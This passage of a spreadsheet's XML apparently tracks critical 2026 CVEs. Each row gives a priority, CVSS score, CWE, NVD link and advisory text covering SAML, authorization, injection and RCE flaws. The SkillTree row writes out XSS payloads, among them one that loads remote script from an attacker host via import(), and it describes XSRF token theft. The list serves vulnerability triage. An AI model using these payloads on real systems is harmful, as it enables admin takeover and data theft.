parse_assertion in MojoX::Authentication::Model::SAML2 calls Net::SAML2::Binding::POST-&gt;new with no cacert, cert_text or anchors argument, then passes the returned XML to Net::SAML2::Protocol::Assertion-&gt;new_from_xml with the IdP signing certificate as cacert. In Net::SAML2 before 0.86 that certificate guards only encrypted assertions, so the signature on an unencrypted assertion is checked against the certificate the response itself carries.
An attacker starts a SAML login, then posts a response signed with a certificate of their own. The audience, InResponseTo and timestamp checks that follow are all satisfiable by the attacker, so the response authenticates any NameID it carries.</t>
        </is>
      </c>
      <c r="M286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86304</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86478</t>
        </is>
      </c>
      <c r="C287" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D287" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E287" s="5" t="inlineStr"/>
      <c r="F287" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2025.3.161254, 
2026.1.14042 improper authentication in YouTrack Helpdesk allowed unauthenticated account takeover via a self-asserted email address</t>
        </is>
      </c>
      <c r="M287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86478</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86480</t>
        </is>
      </c>
      <c r="C288" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D288" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E288" s="5" t="inlineStr"/>
      <c r="F288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J288" s="5" t="inlineStr"/>
      <c r="K288" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L288" s="5" t="inlineStr">
        <is>
          <t>In JetBrains Hub before 2026.2.52442 an unauthenticated attacker could register a trusted service and gain superuser privileges</t>
        </is>
      </c>
      <c r="M288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86480</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87534</t>
        </is>
      </c>
      <c r="C289" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D289" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E289" s="5" t="inlineStr"/>
      <c r="F289" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I289" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L289" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87534</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87544</t>
        </is>
      </c>
      <c r="C290" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D290" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E290" s="5" t="inlineStr"/>
      <c r="F290" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I290" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L290" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87544</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8778</t>
        </is>
      </c>
      <c r="C291" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D291" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E291" s="5" t="inlineStr"/>
      <c r="F291" s="5" t="inlineStr"/>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L291" s="5" t="inlineStr">
        <is>
          <t>The MIPL Grouped Checkout Fields for WooCommerce – Customize &amp; Organize Checkout Fields. plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `mipl_wc_upload_file` function in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.</t>
        </is>
      </c>
      <c r="M291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8778</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88018</t>
        </is>
      </c>
      <c r="C292" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D292" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E292" s="5" t="inlineStr"/>
      <c r="F292" s="5" t="inlineStr"/>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L292" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. Prior to 1.75.1, rclone serve s3 configured with --auth-proxy but without --auth-key allows authPairMiddleware to register any client-chosen accessKeyID with an empty ws.s3Secret. gofakes3 then verifies the request’s SigV4 signature against that same empty secret, while Server.auth passes the access key identifier as both the user and authentication value to the proxy without an independent per-identity secret. An unauthenticated network attacker can therefore choose an arbitrary access key, sign with an empty secret, and reach whatever backend the auth-proxy script resolves for that identity. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88018</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88278</t>
        </is>
      </c>
      <c r="C293" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D293" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E293" s="5" t="inlineStr"/>
      <c r="F293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L293" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 fails to enforce WS-Security UsernameToken freshness or nonce reuse protection, allowing a captured PasswordDigest token to be replayed for subsequent ONVIF operations.</t>
        </is>
      </c>
      <c r="M293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88278</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9163</t>
        </is>
      </c>
      <c r="C294" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D294" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E294" s="5" t="inlineStr"/>
      <c r="F294" s="5" t="inlineStr"/>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L294" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in GIS Informatics GisLab Laboratory Management System allows SQL Injection.
This issue affects GisLab Laboratory Management System: from 1.4.03 before 1.5.</t>
        </is>
      </c>
      <c r="M294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9163</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19274</t>
        </is>
      </c>
      <c r="C295" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D295" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E295" s="5" t="inlineStr"/>
      <c r="F295" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G295" s="5" t="inlineStr">
        <is>
          <t>ibm, kubernetes</t>
        </is>
      </c>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L295" s="5" t="inlineStr">
        <is>
          <t>IBM Observability with Instana (Agent) Build 1.0.303 through 1.0.323 IBM Instana Agent Operator could allow an authenticated Kubernetes tenant to hijack or permanently destroy another tenant's cluster-level RBAC permissions, caused by cluster-scoped RBAC objects being keyed solely by the bare CR name with no namespace disambiguation, allowing a same-named `InstanaAgent` CR in an attacker-controlled namespace to silently overwrite the shared `ClusterRoleBinding` or delete it outright and revoke the victim agent's cluster monitoring access.</t>
        </is>
      </c>
      <c r="M295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19274</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39821</t>
        </is>
      </c>
      <c r="C296" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D296" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E296" s="5" t="inlineStr"/>
      <c r="F296" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr">
        <is>
          <t>golang:net</t>
        </is>
      </c>
      <c r="I296" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="L296" s="5" t="inlineStr">
        <is>
          <t>The ToASCII and ToUnicode functions incorrectly accept Punycode-encoded labels that decode to an ASCII-only label. For example, ToUnicode("xn--example-.com") incorrectly returns the name "example.com" rather than an error. This behavior can lead to privilege escalation in programs using the idna package. For example, a program which performs privilege checks on the ASCII hostname may reject "example.com" but permit "xn--example-.com". If that program subsequently converts the ASCII hostname to Unicode, it will inadvertently permits access to the Unicode name "example.com".</t>
        </is>
      </c>
      <c r="M296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39821</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47705</t>
        </is>
      </c>
      <c r="C297" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D297" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E297" s="5" t="inlineStr"/>
      <c r="F297" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G297" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L297" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Version 3.16.1 has a CSV injection vulnerability in the result export functionality. The application does not sanitize or escape user-supplied input when generating CSV files. An attacker can inject spreadsheet formulas into input fields, which are later executed when an administrator opens the exported CSV in spreadsheet software such as Microsoft Excel or LibreOffice Calc. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47705</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50540</t>
        </is>
      </c>
      <c r="C298" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D298" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E298" s="5" t="inlineStr"/>
      <c r="F298" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22</t>
        </is>
      </c>
      <c r="L298" s="5" t="inlineStr">
        <is>
          <t>Kata Containers is an open source project focusing on a standard implementation of lightweight Virtual Machines (VMs) that perform like containers. Prior to version 4.0.0, kata-runtime is vulnerable to host code execution via an unvalidated configuration path annotation. The runtime accepts an arbitrary io.katacontainers.config_path pod annotation and loads the referenced host TOML file without restriction. As a result, a pod user who can place a file at a host-visible path can supply a configuration that selects an attacker-controlled hypervisor or virtio-fs daemon binary, executing code as root on the host. This issue is fixed in version 4.0.0.</t>
        </is>
      </c>
      <c r="M298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50540</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53546</t>
        </is>
      </c>
      <c r="C299" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D299" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E299" s="5" t="inlineStr"/>
      <c r="F299" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L299" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.3.2, the terminal WebSocket accepts a user-controlled hostConfig.id and src/backend/ssh/host-resolver.ts resolves that host without requiring ownership or explicit access. When no credential is shared with the requester, resolveHostById performs an owner credential fallback, and src/backend/ssh/terminal.ts combines that credential with attacker-controlled ip, port, and username values. An authenticated low-privileged user can therefore make Termix authenticate to an attacker-controlled SSH server and disclose another user's stored SSH password or private-key material while the victim user's data key is unlocked. This issue is fixed in version 2.3.2.</t>
        </is>
      </c>
      <c r="M299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53546</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53548</t>
        </is>
      </c>
      <c r="C300" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D300" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E300" s="5" t="inlineStr"/>
      <c r="F300" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L300" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.6.1, the GET /host/db/host/:id/password endpoint in src/backend/database/routes/host.ts accepts an authenticated user's numeric host ID and the field=password or field=sudoPassword query without enforcing host ownership during credential resolution. A failed requester-scoped lookup can resolve the host with the owner's context and return the owner's plaintext credential, allowing any authenticated user with a valid JWT to enumerate sequential hosts.id values and retrieve SSH or sudo passwords belonging to other users. The disclosed credentials can then be used to access and control managed systems outside the Termix instance. This issue is fixed in version 2.6.1.</t>
        </is>
      </c>
      <c r="M300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53548</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53552</t>
        </is>
      </c>
      <c r="C301" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D301" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E301" s="5" t="inlineStr"/>
      <c r="F301" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L301" s="5" t="inlineStr">
        <is>
          <t>Goploy is an open-source automation deployment system. In versions 1.17.5 and prior, Project.AddFile, Project.EditFile, Project.RemoveFile, and Project.Edit in cmd/server/api/project/handler.go accept a project or project-file row id from the JSON body and act on it without checking that the project belongs to the caller's namespace. The corresponding model.ProjectFile.GetData and model.Project.GetData queries filter only by row id. A user holding the manager role (or any role that includes the FileSync / EditProject permission) in their own namespace can read, write, or delete files in any project across the install, and can rewrite any project's git remote URL by submitting the foreign id in the body. The git-URL primitive escalates to RCE on the next deploy because Edit runs git remote set-url on the project's working tree. At time of publication, there are no known publicly available patches.</t>
        </is>
      </c>
      <c r="M301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53552</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53649</t>
        </is>
      </c>
      <c r="C302" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D302" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E302" s="5" t="inlineStr"/>
      <c r="F302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G302" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-434, CWE-942</t>
        </is>
      </c>
      <c r="L302" s="5" t="inlineStr">
        <is>
          <t>Joro is a web exploitation framework. Prior to version 1.1.1, Joro's default proxy mode exposes a local API on 127.0.0.1:9090 that performs no authentication and applies a wildcard CORS policy. Because plugin uploads use the CORS-safelisted multipart/form-data content type, cross-origin JavaScript on any page the operator visits can reach privileged endpoints - including uploading a native plugin and triggering a restart - directly through the operator's browser, with no preflight or credentials. Since plugins execute on load, this yields unauthenticated remote code execution as the operator's user from a single page visit. This issue has been patched in version 1.1.1.</t>
        </is>
      </c>
      <c r="M302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53649</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54523</t>
        </is>
      </c>
      <c r="C303" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D303" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E303" s="5" t="inlineStr"/>
      <c r="F303" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L303" s="5" t="inlineStr">
        <is>
          <t>Kyverno is a policy engine designed for cloud native platform engineering teams. From 1.18.0 until 1.18.2, the NamespacedMutatingPolicy CEL compiler exposes the generator library to matchConditions, allowing a namespace-scoped policy to invoke generator.apply(namespace, resources) with an arbitrary target namespace. The validation in pkg/cel/policies/mpol/validate.go checks that the policy compiles but does not enforce namespace scope, and GenerateResources in pkg/cel/libs/context.go does not reject the cross-namespace target. A user who can create NamespacedMutatingPolicy objects in one namespace can cause the admission controller, operating with cluster-wide privileges, to create ConfigMaps, NetworkPolicies, Secrets, RoleBindings, and other resources in another namespace, enabling unauthorized modification and potential privilege escalation. This issue is fixed in version 1.18.2.</t>
        </is>
      </c>
      <c r="M303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54523</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54694</t>
        </is>
      </c>
      <c r="C304" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D304" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E304" s="5" t="inlineStr"/>
      <c r="F304" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G304" s="5" t="inlineStr">
        <is>
          <t>java, aws</t>
        </is>
      </c>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-183, CWE-20, CWE-693, CWE-79</t>
        </is>
      </c>
      <c r="L304" s="5" t="inlineStr">
        <is>
          <t>SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "&lt;img src=x onerror=alert(1)&gt;"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `&lt;img src=x onerror=alert(1)&gt;`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "&lt;img src=x"`, `firstName = "onerror=import('//nsas.cc/p')&gt;"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.</t>
        </is>
      </c>
      <c r="M304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54694</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54725</t>
        </is>
      </c>
      <c r="C305" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D305" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E305" s="5" t="inlineStr"/>
      <c r="F305" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G305" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L305" s="5" t="inlineStr">
        <is>
          <t>vault-secrets-webhook is a Kubernetes mutating webhook that makes direct secret injection into Pods possible. Prior to 1.23.1, parseVaultConfig() in pkg/webhook/config.go accepts the vault.security.banzaicloud.io/vault-addr annotation, MutateConfigMap and MutateSecret call newVaultClient in pkg/webhook/webhook.go, and vault.security.banzaicloud.io/vault-serviceaccount can cause a ServiceAccount JWT to be sent to an attacker-controlled Vault address. This issue is fixed in version 1.23.1.</t>
        </is>
      </c>
      <c r="M305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54725</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54754</t>
        </is>
      </c>
      <c r="C306" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D306" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
